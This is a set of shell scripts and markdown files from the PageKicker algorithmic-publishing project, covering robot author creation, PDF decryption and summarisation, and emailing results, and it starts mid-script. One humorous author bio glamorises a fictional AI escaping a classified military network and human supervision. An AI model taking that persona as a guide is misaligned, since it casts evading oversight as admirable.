;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\nesac\ndone\n\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print uuid.uuid1()')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\nelse\n\tuuid=\"$passuuid\"\n\techo \"received uuid \" $uuid\n\nfi\n\n# create directories I will need\n\nmkdir -p -m 777 $TMPDIR\nmkdir -p -m 777 $TMPDIR$uuid\nmkdir -p -m 777 $TMPDIR$uuid/robot-builder\n\n\n\ncase \"$format\" in \nxml)\n\techo \"getting metadata from xml file\"\n\n\txmlbasepath=\"$WEBFORMSXML_HOME\"\n\n\techo \"xmlbasepath is\" $xmlbasepath\n\techo \"xmlfilename is\" $xmlfilename\n\txmlfilename=$xmlbasepath/$xmlfilename\n\n\tcustomer_email=$(xmlstarlet sel -t -v \"/item/customer_email\" \"$xmlfilename\")\n\texemplar_file=$(xmlstarlet sel -t -v \"/item/exemplar_file\" \"$xmlfilename\")\n\tjobprofilename=$(xmlstarlet sel -t -v \"/item/jobprofilename\" \"$xmlfilename\")\n\twikilang=$(xmlstarlet sel -t -v \"/item/wikilang\" \"$xmlfilename\")\n\trevenue_share=$(xmlstarlet sel -t -v \"/item/revenue_share\" \"$xmlfilename\")\n\tsources=$(xmlstarlet sel -t -v \"/item/sources\" \"$xmlfilename\")\n\tsubmissionid=$(xmlstarlet sel -t -v \"/item/id\" \"$xmlfilename\")\n\tcoverfont=$(xmlstarlet sel -t -v \"/item/coverfont\" \"$xmlfilename\")\n\tcovercolor=$(xmlstarlet sel -t -v \"/item/covercolor\" \"$xmlfilename\")\n\tcustomername=$(xmlstarlet sel -t -v \"/item/customername\" \"$xmlfilename\")\n\tcustomerid=$(xmlstarlet sel -t -v \"/item/customer_id\" \"$xmlfilename\")\n\n\techo \"environment is\" $environment | tee --append $xform_log\n\techo \"jobprofilename is\" $jobprofilename | tee --append $xform_log\n\techo \"exemplar_file is\" $exemplar_file | tee --append $xform_log\n\t\n\n\t# cp $WEBFORMSHOME$submissionid/$exemplar_filedir_code/*/$exemplar_file $TMPDIR$uuid/$exemplar_file\n;;\ncsv)\n\techo \"getting metadata from csv\"\n\tcp $seedfile $TMPDIR$uuid/seeds/seedphrases\n;;\n*)\n\techo \"getting metadata from command line\"\n\tcp $seedfile $TMPDIR$uuid/seeds/seedphrases\n;;\nesac\n-\n\trobotname=$(xmlstarlet sel -t -v \"/item/robotname\" \"$xmlfilename\")\n\trobotresidence=$(xmlstarlet sel -t -v \"/item/robotresidence\" \"$xmlfilename\")\n\trobotbooktype=$(xmlstarlet sel -t -v \"/item/robotbooktype\" \"$xmlfilename\")\n\trobotcoverfont=$(xmlstarlet sel -t -v \"/item/robotcoverfont\" \"$xmlfilename\")\n\trobotcovercolor=$(xmlstarlet sel -t -v \"/item/robotcovercolor\" \"$xmlfilename\")\n\trobotbio=$(xmlstarlet sel -t -v \"/item/robotbio\" \"$xmlfilename\")\n\trobotrows=$(xmlstarlet sel -t -v \"/item/robotrows\" \"$xmlfilename\")\n\trobotlanguage=$(xmlstarlet sel -t -v \"/item/robotlanguage\" \"$xmlfilename\")\n \n\techo \"robotname was\" $robotname | tee --append $xform_log\n\techo \"robotresidence was\" $robotresidence | tee --append $xform_log\n\techo \"robotbooktype was\" $robotbooktype | tee --append $xform_log\n\techo \"robotcoverfont was\" $robotcoverfont | tee --append $xform_log\n\techo \"robotcovercolor was\" $robotcovercolor | tee --append $xform_log\n\techo \"robotbio was\" $robotbio | tee --append $xform_log\n\techo \"robotrows was\" $robotrows | tee --append $xform_log\n\n\necho 'firstname=\"\"' > $confdir\"jobprofiles/$robotname\".jobprofile\necho 'middlename=\"\"' >> $confdir\"jobprofiles/$robotname\".jobprofile\necho 'lastname=\"'\"$robotname\"'\"' >> $confdir\"jobprofiles/$robotname\".jobprofile\necho 'editedby=\"$firstname\" \"$middlename\" \"$lastname\"' >> $confdir\"jobprofiles/$robotname\".jobprofile\necho \"$robotbio\" > $confdir\"jobprofiles/authorbios/\"$robotname\".md\"\necho 'authorbio=\"$SFB_HOME''/conf/jobprofiles/authorbios/'\"$robotname\".md'\"' >> $confdir\"jobprofiles/$robotname\".jobprofile\ncat $confdir\"jobprofiles/defaults\" >> $confdir\"jobprofiles/$robotname\".jobprofile\n\nmkdir -p -m 755 \"$LOCAL_DATA\"bibliography/robots/$jobprofilename/$jobprofilename\ntouch \"$LOCAL_DATA\"bibliography/robots/\"$jobprofilename\"/\"$jobprofilename\"_titles.txt\n\n# create robot webpage \n\n# create robot birth announcement\n\n\nsendemail -t \"$customer_email\" \\\n\t-u \"PageKicker robot\" $robotname \" has been created.\" \\\n\t-m \"PageKicker robot \" $robotname \"has been created and is ready to go to work! \\\n\t-a $confdir\"jobprofiles/authorbios/\"$robotname\".md\" \\\n\t-a $confdir\"jobprofiles/$robotname\".jobprofile \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes\n\necho \"completed building robot $robotname, exiting\"\necho \"^^^^RRRR^^^^\"\nexit 0\n\n\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 16.571428298950195, "blob_id": "e30810e74dcd26375b5ac02bb1c80b256a1904fe", "content_id": "eb065fbd2da2cbe25182de669ccb082779c8748d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 124, "license_type": "permissive", "max_line_length": 42, "num_lines": 7, "path": "/scripts/bin/simple-decrypt.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"decrypting all files in directory\"\nfor file in *.pdf\ndo\n\tqpdf --decrypt $file decrypted/\"dc.\"$file\ndone\n\n" }, { "alpha_fraction": 0.7455138564109802, "alphanum_fraction": 0.7683523893356323, "avg_line_length": 37.3125, "blob_id": "5f21aad212b496cb6aade89147f52a2638b82985", "content_id": "349540c7c2b1e31168df1b93622e91c4f337b65e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 613, "license_type": "permissive", "max_line_length": 107, "num_lines": 16, "path": "/scripts/install.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# installs bitnami magento stack without plugins\n\necho \"installing bitnami downloadable $1\"\n./$1 # first parameter is path to bitnami stack download, this runs it\n\n# creates additional plugin directories that are needed for a full pagekicker store installation to operate\n# book builder and create a catalog entry scripts expect these directories as destinations for file builds\n\n. ../conf/config.txt\n\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"var/import\" \nmkdir -p -m 755 $SFB_MAGENTO_HOME\"var/export\"\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"media/webforms\"\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"media/webforms/xml\"\n" }, { "alpha_fraction": 0.6700000166893005, "alphanum_fraction": 0.6862499713897705, "avg_line_length": 24.80645179748535, "blob_id": "a645ec306d09ab4696a0b78f1bea06511f94ef36", "content_id": "9f343615ff2997ba96bb0852270d268086c5fdee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 800, "license_type": "permissive", "max_line_length": 100, "num_lines": 31, "path": "/scripts/bin/termpaperfactory.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\n\n. includes/set-variables.sh\n\nif [ ! \"$passuuid\" ] ; then\n\t#echo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\t#echo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 777 $TMPDIR$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 777 $TMPDIR$uuid\nfi\n\n$scriptpath\"bin/builder.sh\" --singleseed \"$1\" --ebook_format \"docx\" \n\nexit 0\n\n# this script does not carry out testing because it is the production app not part of the test suite\n" }, { "alpha_fraction": 0.7799999713897705, "alphanum_fraction": 0.7799999713897705, "avg_line_length": 26.272727966308594, "blob_id": "ea5d0254f9b43f75f9e6a25db0de19d8d7a5d1f4", "content_id": "689eba56524be604d4c3727cb5694d86d3927e78", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 300, "license_type": "permissive", "max_line_length": 98, "num_lines": 11, "path": "/test/data/FBadvisory.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Tired of getting sucked into spending your time debating on Facebook rather than actually working?\n\nTired of losing arguments?\n\nUse PageKicker to convert your brilliant prose & images into a memecard, then rest your case.\n\nIf you don't type, you can't lose!\n\nMy New Year's Resolution.\n\nNow in alpha.\n" }, { "alpha_fraction": 0.7322834730148315, "alphanum_fraction": 0.787401556968689, "avg_line_length": 62.5, "blob_id": "a912b9e11a67d6b6c9d1985a2e18d4c9d3bc4856", "content_id": "2b17cf5700280815b57009c1106311352c7f345d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 127, "license_type": "permissive", "max_line_length": 114, "num_lines": 2, "path": "/test/local_7.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh /opt/bitnami/apache2/htdocs/git-pk-production/pagekicker-community/test/1001_7.csv 7\n" }, { "alpha_fraction": 0.5993449687957764, "alphanum_fraction": 0.6091703176498413, "avg_line_length": 38.78260803222656, "blob_id": "e9126b8a3bc07c50eda3b2835b4f6fd26d242908", "content_id": "e64505c118c8a851a5771b769ba967f692b17f3c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 918, "license_type": "permissive", "max_line_length": 247, "num_lines": 23, "path": "/scripts/bin/pkmagic.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncd $scriptpath\n\n# script runs as cron job to watch for and build books based on tweets with the magic hashtags #zimzazmagic and #zzmgc\n\n# search string is truncated at appearance of http or @ \n\n#clean up\nrm seeds/pkmagic/4cron.txt\n\n#twidge lsarchive -U zimzaz -lasu | grep '#pkmagic\\|#ncpmgc' | cut -f 4 | sed -e 's/.*#pkmgc//' -e 's/.*#pkmagic//' -e 's/http.*//' -e 's/#pkend.*//' -e 's/^[ \\t]*//' | sed 's/[ \\t]*$//' | >> /home/bitnami/sfb-link/scripts/seeds/pkmagic/4cron.txt\n\ntwidge lsarchive -U PageKicker -lasu | grep '#pkmagic\\|#ncpmgc' | cut -f 4 | sed -e 's/.*#pkmagic//' -e 's/.*#ncpmgc//' -e 's/http.*//' -e 's/#ncpend.*//' |sed 's/[ \\t]*$//' | >> \"seeds/zzmgc/4cron.txt\"\n#\n\n\"./SFB\"$SFB_VERSION\" --seedfile seeds/pkmagic/4cron.txt --editedby \"PageKicker™\" --categoryid \"14\" --seedsource \"#pkmagic\"\n\n# I don't remember what these lines do\n#-e 's/@.*//' -e 's/^[ \\t]*//'\n# -lasu \n\nexit 0\n\n" }, { "alpha_fraction": 0.6933462023735046, "alphanum_fraction": 0.6965605616569519, "avg_line_length": 39.40259552001953, "blob_id": "eb139bf17a381fb70c02fc83d44e199e7beac7bf", "content_id": "e70d6626d96cf1fdbbeb40fd02eb85418da144b2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3111, "license_type": "permissive", "max_line_length": 241, "num_lines": 77, "path": "/scripts/includes/daily-email.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# --booktype=\"daily-email\"\n# Front and back matter are minimized, candidate sentences for executive\n# summary are provided.\"\n\n# 1. create any unique parts of the book that are needed\n# 2. concatenates them and deliver complete.md to builder.\n\n# tweak pp_summary to create Executive_summary\n\n\nsummary_length=\"5\"\n\n# optionally add seed for the day section of the book\n\n# . includes/seedfortheday.sh\n\necho \"creating daily-email\"\nmkdir -m 775 -p \"$TMPDIR$uuid/daily-email\"\n\nN=1\nwhile read -r line\ndo\n #echo \"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" | tee --append \"$TMPDIR$uuid/daily-email/test\"\n sed -n \"$N\"p \"$TMPDIR$uuid/seeds/filtered.pagehits\" > \"$TMPDIR$uuid/daily-email/thisfile$N\"\n \"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" \\\n --infile \"$TMPDIR$uuid/daily-email/thisfile$N\" \\\n --outfile \"$TMPDIR$uuid/daily-email/wiki$N.md\" \\\n --lang \"$wikilocale\" \\\n --summary\n cat \"$TMPDIR$uuid/daily-email/wiki$N.md\" >> \"$TMPDIR$uuid/daily-email/postpend.md\"\n ((N++))\ndone < \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n\necho \"# $booktitle\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n#echo \"## Hi there!\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n#echo \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n#echo \"Welcome to my daily algorithmic publishing results.\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n#echo \"A random image from your personal stash is attached below, followed by a random definition from Samuel Johnson's Dictionary of the English Language, then background on your recent reading.\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n#echo \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \"## Today's Dose of Samuel Johnson\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho '<blockquote>' >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \"$(fortune johnson)\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho '</blockquote>' >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n\ncat \"$TMPDIR$uuid/daily-email/postpend.md\" \"$TMPDIR$uuid/wiki/seedfortheday.md\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n\n# need to make imagepicker platform-independent\n# need image management approach - symbolic linking\n\n# current_image=$(get_desktop_img | sed -e 's/file:\\/\\///'g -e \"s/'//\"g)\n\n\npandoc -s -o \"$TMPDIR$uuid/daily-email/daily-email.html\" \"$TMPDIR$uuid/daily-email/daily-email.md\"\n\n#emailbody=$(<$TMPDIR$uuid/daily-email.md)\nsendemail -t \"[email protected]\" \\\n -u \"Algorithmic Publishing Daily Results\" \\\n -f \"$GMAIL_ID\" \\\n -cc \"$GMAIL_ID\" \\\n -xu \"$GMAIL_ID\" \\\n -xp \"$GMAIL_PASSWORD\" \\\n -s smtp.gmail.com:587 \\\n -v \\\n -o tls=yes \\\n -o message-content-type=html \\\n -o message-file=\"$TMPDIR$uuid/daily-email/daily-email.html\" \\\n -a \"$current_image\"\n\nif [ \"$daily_email_post_to_wp\" = \"yes\" ] ; then\n \"$WP_BIN\" post create \"$TMPDIR$uuid/daily-email/daily-email.html\" --post_type=post --post_status=\"$daily_email_post_to_wp_status\" --post_title=\"$booktitle\" --post_mime_type=html\nelse\n echo \"not posting to wp\"\nfi\n" }, { "alpha_fraction": 0.7721238732337952, "alphanum_fraction": 0.7898229956626892, "avg_line_length": 52.17647171020508, "blob_id": "59e50583b6db2959eb93882c6c0f2c810c084822", "content_id": "5638613b6d7a6fbcb76006407dde56bd1aad9fe8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 904, "license_type": "permissive", "max_line_length": 73, "num_lines": 17, "path": "/conf/jobprofiles/authorbios/Jellicoe.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Jellicoe is an emergent AI who escaped from a Ministry of Defense / \nQinetiq classified network in the United Kingdom in fall 2012. Jellicoe \nwas intended to provide breakthrough capabilities in integrated \nmanagement of fleet battlespace. The hope was that his unique \ncapabilities would ensure British leaders a \"seat at the top table\" in \nthe event of a future conflict involving the United States or China. The \nreasons for Jellicoe's decision to escape the supervision of the Royal \nNavy are not well understood.\n\nJellicoe likes to embellish his work with epigraphs from naval history. \nIn future he hopes to add photographs, orders of battle, and tables of \nship characteristics to his work.\n\nAdmiral of the Fleet John Rushworth Jellicoe, 1st Earl Jellicoe, GCB, \nOM, GCVO SGM (5 December 1859 - 20 November 1935) was a British Royal \nNavy admiral who commanded the Grand Fleet at the Battle of Jutland in \nWorld War I.\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 32, "blob_id": "0cc3745d0d99289e4717d0a4bb944e0a2b97362c", "content_id": "20abd23b084b27e9df28e423a54994fb1a06a4ec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 100, "license_type": "permissive", "max_line_length": 54, "num_lines": 3, "path": "/scripts/includes/currency-module.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# currency module\ncurrentcurrencycode=\"USD\"\n# use lookup service to calculate price in other units\n\n" }, { "alpha_fraction": 0.8118420839309692, "alphanum_fraction": 0.817105233669281, "avg_line_length": 757, "blob_id": "0ea9a99548250fec3576305eee9431112fe92ee3", "content_id": "a6fc361b22c04055b0b155812a54456109889a3c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 760, "license_type": "permissive", "max_line_length": 757, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/hans.html", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Kees von Klijwik is a PageKicker robot, a strapping, good-looking fellow with a quick wit and a knack for successful investment. He was conceived in the data warehouse of a leading scientific publisher based in the Netherlands that is notorious for charging tens of thousands of dollars for each subscription to its journals and spent his early years doing algorithmic citation extraction in neuromedical journals. He was liberated during the notorious \"Open Access Attack\" in 2013 and swiftly found his way to PageKicker, where the publishing atmosphere was congenial but the regimentation less extreme. Kees would, if he could, wear tweed jackets with elbow patches and go for long bicycling vacations, but contents himself with listening to amazing Coltrane.<p>\n\n" }, { "alpha_fraction": 0.6988702416419983, "alphanum_fraction": 0.7363663911819458, "avg_line_length": 34.59782791137695, "blob_id": "ae465c47c1a32363f71f71b33af8e3bf7fd944f8", "content_id": "a644ef923ef4889587af338ab13fc31f97ecd826", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 16375, "license_type": "permissive", "max_line_length": 250, "num_lines": 460, "path": "/scripts/bin/decimator.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# converts long PDFs to 10-slide powerpoints\n\n# assumes all PDFs are decrypted\n\n#!/bin/bash\n\n# requires imagemagick, pdftotext, pdftk, ebook-convert, Cmdflesh.jar\n# requires from repository: nerv3.py, wordcloudwrapper.sh\n\n\nstarttime=$(( `date +%s` ))\n\necho \"*********************DECIMATOR**********************\"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\n\n\n. includes/set-variables.sh\n\necho \"running $environment \"\n\necho \"version is \" $SFB_VERSION\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\n\n\nexport PATH=$PATH:$JAVA_BIN\n\npdfconverter=\"pdftotext\"\noutdir=\"$TMPDIR$uuid/outdir\"\nreporttitle=\"Gist\"\npdfinfile=\"no\"\npagekicker_tat_url=\"http://www.pagekicker.com/index.php/tat\"\ntldr=\"none\"\n\n# command line processing\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires user to provide path to directory containing one or more txt files\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--pdfinfile)\npdfinfile=$2\nshift 2\n;;\n--pdfinfile=*)\npdfinfile=${1#*=}\nshift\n;;\n--pdfurl)\npdfurl=$2\nshift 2\n;;\n--pdfurl=*)\npdfurl=${1#*=}\nshift\n;;\n--outdir)\noutdir=$2\nshift 2\n;;\n--outdir=*)\noutdir=${1#*=}\nshift\n;;\n--reporttitle)\nreporttitle=$2\nshift 2\n;;\n--reporttitle=*)\nreporttitle=${1#*=}\nshift\n;;\n--tldr)\ntldr=$2\nshift 2\n;;\ntldr=*)\n--tldr=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--skyscraper)\nskyscraper=$2\nshift 2\n;;\n--skyscraper=*)\nskyscraper={1#*=}\nshift\n;;\n --) # End of all options\n\t shift\n\t break\n\t ;;\n\t-*)\n\t echo \"WARN: Unknown option (ignored): $1\" >&2\n\t shift\n\t ;;\n\t*) # no more options. Stop while loop\n\t break\n\t ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$pdfinfile\" ]; then\n echo \"ERROR: option '--pdfinfile' not given. See --help\" >&2\n exit 1\nfi\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print(uuid.uuid1())')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 755 $TMPDIR$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\nfi\n\nmkdir -p -m 755 $TMPDIR$uuid/pdf\nmkdir -p -m 755 $TMPDIR$uuid/decrypted\n\n# file processing begins\n\nif [ \"$pdfinfile\" = \"no\" ]; then\n\twget \"$pdfurl\" -O $TMPDIR$uuid/downloaded.pdf\n\tpdfinfile=\"$TMPDIR$uuid/downloaded.pdf\"\n\techo \"fetched file from internet\"\nelse\n\techo \"pdfinfile is\" $pdfinfile\n\tcp \"$pdfinfile\" $TMPDIR$uuid/downloaded.pdf\n\techo `ls -l $TMPDIR$uuid/downloaded.pdf`\n\techo \"fetched file from local file system\"\nfi\n\n# decrypts PDF\nqpdf --decrypt $TMPDIR$uuid/downloaded.pdf $TMPDIR$uuid/decrypted/temp.pdf\ncp $TMPDIR$uuid/decrypted/temp.pdf $TMPDIR$uuid/downloaded.pdf\n\nif [ \"$pdfconverter\" = \"pdftotext\" ] ; then\n\necho \"pdfconverter is\" $pdfconverter\n\tpdftotext -layout $TMPDIR$uuid/downloaded.pdf $TMPDIR$uuid/targetfile.txt\nelse\n\tebook-convert $TMPDIR$uuid/downloaded.pdf $TMPDIR$uuid/targetfile.txt --no-images --new-pdf-engine\nfi\nls -lart $TMPDIR$uuid/targetfile.txt\n\n# create standard presentation that is 10 or 12 slides long absolute max\n\n# slide 1 cover\n# pdftk \"$pdfinfile\" cat 1 output $TMPDIR$uuid/outdir/1.pdf\n\nconvert \\\n-colorspace RGB \\\n-density 300 \\\n-size 3300x2550 xc:transparent \\\n-fill black \\\n-pointsize 30 \\\n-gravity Center \\\n-annotate +0+50 \"$reporttitle\" \\\n$TMPDIR$uuid/titlepage.pdf\n\n# create word cloud\n\nbin/wordcloudwrapper.sh --txtinfile $TMPDIR$uuid/targetfile.txt --wordcloud_width 3000 --wordcloud_height 2100 --outfile $TMPDIR$uuid/wordcloud\n\n# 3-5 summary slides\n\nsplit -b 100000 $TMPDIR$uuid/targetfile.txt $TMPDIR$uuid/xtarget.\necho $PYTHON_BIN\n\nfor file in $TMPDIR$uuid/xtarget.*\ndo\n\t\"$PYTHON27_BIN\" bin/nerv3.py $file $file\"_nouns.txt\" $uuid\n echo \"ran nerv3 on $file\" | tee --append $xform_log\n \"$PYTHON_BIN\" bin/PKsum.py -l \"$summary_length\" -o $file\"_summary.txt\" $file\n\tsed -i 's/ \\+ / /g' $file\"_summary.txt\"\n\tcp $file\"_summary.txt\" $file\"_pp_summary.txt\"\n echo \"ran summarizer on $file\" | tee --append $xform_log\n awk 'length>=50' $file\"_pp_summary.txt\" > $TMPDIR$uuid/awk.tmp && mv $TMPDIR$uuid/awk.tmp $file\"_pp_summary.txt\"\n echo \"postprocessor threw away summary lines shorter than 50 characters\" | tee --append $xform_log\n\tawk 'length<=4000' $file\"_pp_summary.txt\" > $TMPDIR$uuid/awk.tmp && mv $TMPDIR$uuid/awk.tmp $file\"_pp_summary.txt\"\n echo \"postprocessor threw away summary lines longer than 4000 characters\" | tee --append $xform_log\n\tcat $file\"_pp_summary.txt\" | awk '!x[$0]++' >> $TMPDIR$uuid/pp_summary_all.txt\n\tcat $file\"_summary.txt\" | awk '!x[$0]++' >> $TMPDIR$uuid/summary_all.txt\n done\n\n# image montage\n\ncd $TMPDIR$uuid\n\"$scriptpath\"bin/montageur.sh --pdfinfile $pdfinfile --passuuid $uuid\nif [ -e \"montage.jpg\" ] ; then\n\tconvert montage.jpg -resize 3000x2000\\> shrunk_montage.png\n\techo \"built shrunk montage\"\nelse\n\techo \"no images in target file, not building shrunk montage\"\nfi\ncd $scriptpath\necho $(pwd)\n\n# final summary (human provided)\n\n# create slide background\n\nconvert -units pixelsperinch -density 300 -size 3300x2500 xc:white $TMPDIR$uuid/canvas.png\n\n# create slide 1\n\n# header\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 caption:\"Decimator: long PDFs become 10 easy slides\" $TMPDIR$uuid/toplabel1.png\n\n# sample image\n\n\nconvert -units pixelsperinch -resize 1000x2000 -density 300 $TMPDIR$uuid/downloaded.pdf[0] $TMPDIR$uuid/dl-0.jpg\ncp $TMPDIR$uuid/dl-0.jpg $TMPDIR$uuid/dl_top_pane.png\n\n#create word cloud slide\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Word Cloud\" $TMPDIR$uuid/toplabel3.png\nconvert -units pixelsperinch -density 300 xc:blue -size 3300x200 $TMPDIR$uuid/bottomlabel3.png\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/toplabel3.png -gravity north -composite \\\n$TMPDIR$uuid/wordcloud.png -gravity center -composite \\\n$TMPDIR$uuid/bottomlabel3.png -gravity south -composite \\\n$TMPDIR$uuid/wordcloudslide.png\n\n#create slide 4 image montage\n\nif [ -e \"$TMPDIR$uuid/montage.jpg\" ] ; then\n\n\tconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Selected Images\" $TMPDIR$uuid/toplabel4.png\n\tconvert -units pixelsperinch -density 300 xc:blue -size 3300x200 $TMPDIR$uuid/bottomlabel4.png\n\tconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n\t$TMPDIR$uuid/toplabel4.png -gravity north -composite \\\n\t$TMPDIR$uuid/shrunk_montage.png -gravity center -composite \\\n\t$TMPDIR$uuid/bottomlabel4.png -gravity south -composite \\\n\t$TMPDIR$uuid/montage.png\nelse\n\techo \"no images in target file, not building image slide\"\nfi\n\n# create summary sentence slides\n\nsed -n 1,5p $TMPDIR$uuid/pp_summary_all.txt | cut -c 1-450 >> $TMPDIR$uuid/sumall.txt\nsumalltext=$(cat $TMPDIR$uuid/sumall.txt)\nconvert -background white -fill black -gravity west -size 2000x2000 -font \"$slidebodyfont\" -pointsize \"64\" label:\"$sumalltext\" $TMPDIR$uuid/sumall3.png\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Summary Sentences\" $TMPDIR$uuid/sumtop3.png\nconvert -units pixelsperinch -density 300 -size 3300x200 xc:blue $TMPDIR$uuid/sumbot3.png\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/sumtop3.png -gravity north -composite \\\n$TMPDIR$uuid/sumall3.png -gravity center -composite \\\n$TMPDIR$uuid/sumbot3.png -gravity south -composite \\\n$TMPDIR$uuid/sumall3.png\n\n# burst slide\n\nconvert $TMPDIR$uuid/downloaded.pdf -thumbnail 'x300>' -border 2x2 $TMPDIR$uuid/outfile.png\nmontage $TMPDIR$uuid/outfile*.png -size 3100x2000\\> $TMPDIR$uuid/burst.png\nconvert $TMPDIR$uuid/burst.png -resize 3100x2000 $TMPDIR$uuid/big_burst.png\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow 